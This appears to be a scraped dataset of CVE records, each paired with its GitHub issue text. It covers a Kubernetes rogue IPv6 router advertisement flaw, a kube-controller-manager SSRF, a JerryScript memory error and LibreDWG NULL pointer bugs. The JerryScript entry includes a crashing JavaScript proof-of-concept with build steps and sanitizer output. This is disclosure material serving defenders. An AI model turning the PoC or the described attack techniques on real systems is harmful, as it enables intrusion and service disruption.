CVSS Rating: [CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L) (6.0 Medium) A cluster configured to use an affected container networking implementation is susceptible to man-in-the-middle (MitM) attacks. By sending “rogue” router advertisements, a malicious container can reconfigure the host to redirect part or all of the IPv6 traffic of the host to the attacker-controlled container. Even if there was no IPv6 traffic before, if the DNS returns A (IPv4) and AAAA (IPv6) records, many HTTP libraries will try to connect via IPv6 first then fallback to IPv4, giving an opportunity to the attacker to respond. ### Am I vulnerable? Kubernetes itself is not vulnerable. A Kubernetes cluster using an affected networking implementation is vulnerable. Binary releases of the kubelet installed from upstream Kubernetes Community repositories hosted at https://packages.cloud.google.com/ may have also installed the `kubernetes-cni` package containing the [containernetworking CNI plugins](https://github.com/containernetworking/plugins), which are affected by CVE-2020-10749. #### Affected Versions The following official kubelet package versions have an affected `kubernetes-cni` package as a dependency: - kubelet v1.18.0-v1.18.3 - kubelet v1.17.0-v1.17.6 - kubelet < v1.16.11 A cluster having an affected `kubernetes-cni` package installed is only affected if configured to use it. #### Third-party components and versions Many container networking implementations are affected, including: - CNI Plugins maintained by the containernetworking team, prior to version 0.8.6 (CVE-2020-10749) (See https://github.com/containernetworking/plugins/pull/484) - Calico and Calico Enterprise (CVE-2020-13597) Please refer to the Tigera Advisory TTA-2020-001 at https://www.projectcalico.org/security-bulletins/ for details - Docker versions prior to 19.03.11 (see https://github.com/docker/docker-ce/releases/v19.03.11) (CVE-2020-13401) - Flannel, all current versions - Weave Net, prior to version 2.6.3 It is believed that the following are not affected: - Cilium - Juniper Contrail Networking - OpenShift SDN - OVN-Kubernetes - Tungsten Fabric Information about the vulnerability status of any plugins or implementations not listed above is currently unavailable. Please contact the provider directly with questions about their implementation. ### How do I mitigate this vulnerability? - Set the host default to reject router advertisements. This should prevent attacks from succeeding, but may break legitimate traffic, depending upon the networking implementation and the network where the cluster is running. To change this setting, set the sysctl `net.ipv6.conf.all.accept_ra` to 0. - Use TLS with proper certificate validation - Disallow `CAP_NET_RAW` for untrusted workloads or users. For example, a Pod Security Policy with a `RequiredDropCapabilities` that includes `NET_RAW` will prevent this attack for controlled workloads. #### Fixed Versions The following packages will bundle fixed versions of the containernetworking CNI plugins that were formerly installed via the `kubernetes-cni` package. - kubelet v1.19.0+ (master branch #91370) - kubelet v1.18.4+ (#91387) - kubelet v1.17.7+ (#91386) - kubelet v1.16.11+ (#91388) Because these versions are not yet available, cluster administrators using packages from the Kubernetes repositories may choose to manually upgrade CNI plugins by retrieving the relevant arch tarball from the containernetworking/plugins [v0.8.6 release](https://github.com/containernetworking/plugins/releases/tag/v0.8.6). The patch versions are [expected to be released on June 17th](https://github.com/kubernetes/sig-release/blob/master/releases/patch-releases.md#timelines), subject to change. ## Additional Details #### Detection - The IPv6 routing table on nodes will show any attacker-created entries. For example, a host with IPv6 disabled might show no default route when running `ip -6 route` but the same host with an attack in progress might show an updated default route or a route to the target address(es). Any IPv6 route with a destination interface of a host-side container network interface should be investigated. - The host-side of a container network interface may show additional configured IPv6 addresses after receiving a rogue RA packet. For example, given a host-side interface of `cbr0` which might normally have no IPv6 address, a dynamic-configured address on the interface may signal an attack in progress. Use this command to view interface addresses: `ip a show dynamic cbr0` #### Affected configurations - Clusters using an affected networking implementation and allowing workloads to run with `CAP_NET_RAW privileges`. The default Kubernetes security context runs workloads with a capabilities bounding set that includes `CAP_NET_RAW`. #### Vulnerability impact - A user able to create containers with `CAP_NET_RAW` privileges on an affected cluster can intercept traffic from other containers on the host or from the host itself. #### Acknowledgements This vulnerability was reported by Etienne Champetier (@champtar). The issue was fixed by Casey Callendrello (@squeed) and maintainers of various container networking implementations. Updates to Kubernetes builds were coordinated by Stephen Augustus (@justaugustus) and Tim Pepper (@tpepper). /area security /kind bug /committee product-security /sig network
CVE-2020-10749: IPv4 only clusters susceptible to MitM attacks via IPv6 rogue router advertisements
https://api.github.com/repos/kubernetes/kubernetes/issues/91507/comments
7
2020-05-27T19:32:29Z
2022-09-14T11:48:50Z
https://github.com/kubernetes/kubernetes/issues/91507
625,973,443
91,507
CVE-2020-8555
2020-06-05T17:15:11.640
The Kubernetes kube-controller-manager in versions v1.0-1.14, versions prior to v1.15.12, v1.16.9, v1.17.5, and version v1.18.0 are vulnerable to a Server Side Request Forgery (SSRF) that allows certain authorized users to leak up to 500 bytes of arbitrary information from unprotected endpoints within the master's host network (such as link-local or loopback services).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 4, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 4, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2020/06/01/4" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2021/05/04/8" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/91542" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/d/topic/kubernetes-security-announce/kEK27tqqs30/discussion" }, { "source": "[email protected]", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3SOCLOPTSYABTE4CLTSPDIFE6ZZZR4LX/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200724-0005/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "1BB84B14-8D71-4BEA-90FC-DB76F9A0F781", "versionEndExcluding": "1.15.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "111CE2DC-82F8-4AF6-99B6-5BB847A18D95", "versionEndExcluding": "1.16.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "9D5D5658-D416-434A-BA64-74DA2A4F13E2", "versionEndExcluding": "1.17.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.18.0:-:*:*:*:*:*:*", "matchCriteriaId": "AF65B08E-28BD-496F-88AE-CB7271BD7379", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/91542
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N) There exists a Server Side Request Forgery (SSRF) vulnerability in kube-controller-manager that allows certain authorized users to leak up to 500 bytes of arbitrary information from unprotected endpoints within the master's host network (such as link-local or loopback services). An attacker with permissions to create a pod with certain built-in Volume types (GlusterFS, Quobyte, StorageOS, ScaleIO) or permissions to create a StorageClass can cause kube-controller-manager to make GET requests or POST requests without an attacker controlled request body from the master's host network. ### Am I vulnerable? You may be vulnerable if: - You are running a vulnerable version (see below) - There are unprotected endpoints normally only visible from the Kubernetes master (including link-local metadata endpoints, unauthenticated services listening on localhost, or other services in the master's private network) - Untrusted users can create pods with an affected volume type or modify storage classes. #### Affected Versions - kube-controller-manager v1.18.0 - kube-controller-manager v1.17.0 - v1.17.4 - kube-controller-manager v1.16.0 - v1.16.8 - kube-controller-manager <= v1.15.11 The affected volume types are: GlusterFS, Quobyte, StorageOS, ScaleIO ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by adding endpoint protections on the master or restricting usage of the vulnerable volume types (for example by constraining usage with a [PodSecurityPolicy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#volumes-and-file-systems) or third-party admission controller such as [Gatekeeper](https://github.com/open-policy-agent/gatekeeper)) and restricting StorageClass write permissions through RBAC. #### Fixed Versions The information leak was patched in the following versions: - kube-controller-manager master - fixed by https://github.com/kubernetes/kubernetes/pull/89794 - kube-controller-manager v1.18.1+ - fixed by https://github.com/kubernetes/kubernetes/pull/89796 - kube-controller-manager v1.17.5+ - fixed by https://github.com/kubernetes/kubernetes/pull/89837 - kube-controller-manager v1.16.9+ - fixed by https://github.com/kubernetes/kubernetes/pull/89838 - kube-controller-manager v1.15.12+ - fixed by https://github.com/kubernetes/kubernetes/pull/89839 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ## Additional Details Exploitation of this vulnerability causes the kube-controller-manager to make a request to a user-supplied, unvalidated URL. The request does not include any kube-controller-manager client credentials. #### Acknowledgements This vulnerability was reported by Brice Augras from Groupe-Asten and Christophe Hauquiert from Nokia. /area security /kind bug /committee product-security /sig storage /area controller-manager
CVE-2020-8555: Half-Blind SSRF in kube-controller-manager
https://api.github.com/repos/kubernetes/kubernetes/issues/91542/comments
4
2020-05-28T16:13:34Z
2021-12-02T22:54:48Z
https://github.com/kubernetes/kubernetes/issues/91542
626,636,248
91,542
CVE-2020-14163
2020-06-15T21:15:10.553
An issue was discovered in ecma/operations/ecma-container-object.c in JerryScript 2.2.0. Operations with key/value pairs did not consider the case where garbage collection is triggered after the key operation but before the value operation, as demonstrated by improper read access to memory in ecma_gc_set_object_visited in ecma/base/ecma-gc.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/commit/c2b662170245a16f46ce02eae68815c325d99821" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3804" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3804
[ "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 7a20150ae747742c178e7d61bb4b3c71476925e2 ###### Build platform Ubuntu 18.04.4 LTS (Linux 4.15.0-91-generic x86_64) and ProductName: Mac OS X ProductVersion: 10.15.4 BuildVersion: 19E287 ###### Build steps ```sh python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ``` python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case - to reproduce the bug for this PoC, keep the same filename length and run the interpreter providing the basename only, as in the Execution steps below. - filename: 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js' ```javascript function main() { var v2 = [1337]; var v3 = [13.37,v2]; var v7 = 0; while (v7 < 6) { var v10 = [13.37,13.37,"object"]; var v14 = [13.37]; var v16 = [v14,v10]; var v17 = {e:1337,__proto__:v16,valueOf:-9007199254740991,toString:WeakSet}; var v19 = [Int8Array,v17]; var v21 = new Map(v19); var v22 = v3.unshift(0); } } main(); ``` ###### Execution steps ```sh ~/jerryscript-test/build/bin/jerry xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js ASAN:DEADLYSIGNAL ================================================================= ==15897==ERROR: AddressSanitizer: SEGV on unknown address 0x55e63e629888 (pc 0x55e6393d7f9d bp 0x000004e7ffe3 sp 0x7fff9494ba70 T0) ==15897==The signal is caused by a READ memory access. #0 0x55e6393d7f9c in ecma_gc_set_object_visited /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:85 #1 0x55e6393d7707 in ecma_gc_mark_map_object /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:330 #2 0x55e6393d7707 in ecma_gc_mark /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:594 #3 0x55e6393d88a4 in ecma_gc_run /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:1395 #4 0x55e6393d15bd in jmem_heap_realloc_block /home/jerryscript-test/jerry-core/jmem/jmem-heap.c:539 #5 0x55e6393d9da4 in ecma_collection_push_back /home/jerryscript-test/jerry-core/ecma/base/ecma-helpers-collection.c:140 #6 0x55e6393f13ee in ecma_op_internal_buffer_append /home/jerryscript-test/jerry-core/ecma/operations/ecma-container-object.c:71 #7 0x55e6393f13ee in ecma_op_container_set /home/jerryscript-test/jerry-core/ecma/operations/ecma-container-object.c:790 #8 0x55e6393ea3cf in ecma_builtin_dispatch_routine /home/jerryscript-test/jerry-core/ecma/builtin-objects/ecma-builtins.c:1115 #9 0x55e6393ea3cf in ecma_builtin_dispatch_call /home/jerryscript-test/jerry-core/ecma/builtin-objects/ecma-builtins.c:1139 #10 0x55e6393f6491 in ecma_op_function_call /home/jerryscript-test/jerry-core/ecma/operations/ecma-function-object.c:1085 #11 0x55e6393f0ec4 in ecma_op_container_create /home/jerryscript-test/jerry-core/ecma/operations/ecma-container-object.c:516 #12 0x55e6393ea525 in ecma_builtin_dispatch_construct /home/jerryscript-test/jerry-core/ecma/builtin-objects/ecma-builtins.c:1180 #13 0x55e63942fb2e in opfunc_construct /home/jerryscript-test/jerry-core/vm/vm.c:849 #14 0x55e63942fb2e in vm_execute /home/jerryscript-test/jerry-core/vm/vm.c:4151 #15 0x55e63942ff2c in vm_run /home/jerryscript-test/jerry-core/vm/vm.c:4232 #16 0x55e6393f4ffd in ecma_op_function_call_simple /home/jerryscript-test/jerry-core/ecma/operations/ecma-function-object.c:886 #17 0x55e6393f6491 in ecma_op_function_call /home/jerryscript-test/jerry-core/ecma/operations/ecma-function-object.c:1085 #18 0x55e63942ee5b in opfunc_call /home/jerryscript-test/jerry-core/vm/vm.c:764 #19 0x55e63942ee5b in vm_execute /home/jerryscript-test/jerry-core/vm/vm.c:4130 #20 0x55e63942ff2c in vm_run /home/jerryscript-test/jerry-core/vm/vm.c:4232 #21 0x55e6393d3b9d in jerry_run /home/jerryscript-test/jerry-core/api/jerry.c:595 #22 0x55e6393cf64d in main /home/jerryscript-test/jerry-main/main-unix.c:759 #23 0x7fa01742eb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #24 0x55e6393d1969 in _start (/home/jerryscript-test/build/bin/jerry+0x1a969) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:85 in ecma_gc_set_object_visited ==15897==ABORTING ``` ``` ~/jerryscript-asan-debug/build/bin/jerry xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js ICE: Assertion '((jmem_cpointer_t) uint_ptr) == uint_ptr' failed at /home/jerryscript-asan-debug/jerry-core/jmem/jmem-allocator.c(jmem_decompress_pointer):219. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` ###### Backtrace ``` $ gdb -nx -q ~/jerryscript-test/build/bin/jerry -ex 'r xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js' Reading symbols from /home/jerryscript-test/build/bin/jerry...done. Starting program: /home/jerryscript-test/build/bin/jerry xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x0000555555574f9d in ecma_gc_set_object_visited (object_p=0x55555a7c6888) at /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:85 85 if (object_p->type_flags_refs >= ECMA_OBJECT_NON_VISITED) (gdb) x/i $rip => 0x555555574f9d <ecma_gc_set_object_visited+35>: mov (%rdi),%ax (gdb) x/g $rdi 0x55555a7c6888: Cannot access memory at address 0x55555a7c6888 ```
Memory corruption in ecma_gc_set_object_visited (jerry-core/ecma/base/ecma-gc.c:85)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3804/comments
0
2020-05-27T18:29:22Z
2020-05-28T05:55:17Z
https://github.com/jerryscript-project/jerryscript/issues/3804
625,930,295
3,804
CVE-2019-20909
2020-07-16T18:15:12.690
An issue was discovered in GNU LibreDWG through 0.9.3. There is a NULL pointer dereference in the function dwg_encode_LWPOLYLINE in dwg.spec.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/commit/d7913b893bfa98fab27f05825dc4cab2d3a20c83" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/178" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "28E3A7DE-65A0-4A6B-BF63-00F627CF17CB", "versionEndExcluding": null, "versionEndIncluding": "0.9.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/178
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, I got some bugs, and I tested on master branch and version **0.9.3**. There are **3 heap overflow**, **2 NULL pointer deference**, **1 denial of service**, **1 stack overflow** (this bug causes memory leak in master branch) in that. Compile with **ASAN** and use **dwgrewrite** to repro that. Hear are some details:
Several bugs need to be fixed.
https://api.github.com/repos/LibreDWG/libredwg/issues/178/comments
18
2019-12-31T06:04:23Z
2020-01-16T12:12:03Z
https://github.com/LibreDWG/libredwg/issues/178
544,098,538
178
CVE-2020-15807
2020-07-17T16:15:11.560
GNU LibreDWG before 0.11 allows NULL pointer dereferences via crafted input files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/186" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/189" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "581DFE64-B504-4D86-AAAA-33836C432C53", "versionEndExcluding": "0.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/186
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hello, I got a NULL pointer deference bug in **0.10.1.2677 and even earlier** by run `dxf2dwg poc -o /dev/null` ``` ==12391==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f9f9b4f3284 bp 0x7ffcfa3b08a0 sp 0x7ffcfa3b0860 T0) ==12391==The signal is caused by a READ memory access. ==12391==Hint: address points to the zero page. #0 0x7f9f9b4f3283 in add_MLINESTYLE_lines /home/skyvast/Documents/libredwg-0.10.1.2677/src/in_dxf.c:1462 #1 0x7f9f9b554a23 in new_object /home/skyvast/Documents/libredwg-0.10.1.2677/src/in_dxf.c:5897 #2 0x7f9f9b564d2d in dxf_objects_read /home/skyvast/Documents/libredwg-0.10.1.2677/src/in_dxf.c:7245 #3 0x7f9f9b56bb16 in dwg_read_dxf /home/skyvast/Documents/libredwg-0.10.1.2677/src/in_dxf.c:7701 #4 0x7f9f9a684ee7 in dxf_read_file /home/skyvast/Documents/libredwg-0.10.1.2677/src/dwg.c:319 #5 0x564a81d20465 in main /home/skyvast/Documents/libredwg-0.10.1.2677/programs/dxf2dwg.c:255 #6 0x7f9f99d8fb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #7 0x564a81d1f489 in _start (/home/skyvast/Documents/asan_libredwg/bin/dxf2dwg+0x2489) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/skyvast/Documents/libredwg-0.10.1.2677/src/in_dxf.c:1462 in add_MLINESTYLE_lines ==12391==ABORTING ```
NULL pointer deference
https://api.github.com/repos/LibreDWG/libredwg/issues/186/comments
3
2020-01-14T12:30:37Z
2020-07-20T02:14:44Z
https://github.com/LibreDWG/libredwg/issues/186
549,536,132
186
CVE-2020-15807
2020-07-17T16:15:11.560
GNU LibreDWG before 0.11 allows NULL pointer dereferences via crafted input files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/186" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/189" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "581DFE64-B504-4D86-AAAA-33836C432C53", "versionEndExcluding": "0.11", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/189
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, I got some bugs which you can reproduce `dxf2dwg $PoC -o /dev/null` .Thses bugs work on version `0.10.1.2685` and `earlier`.
Some NULL pointer bugs
https://api.github.com/repos/LibreDWG/libredwg/issues/189/comments
58
2020-01-16T11:36:57Z
2020-07-20T02:15:32Z
https://github.com/LibreDWG/libredwg/issues/189
550,751,408
189
CVE-2020-15807
2020-07-17T16:15:11.560
GNU LibreDWG before 0.11 allows NULL pointer dereferences via crafted input files.
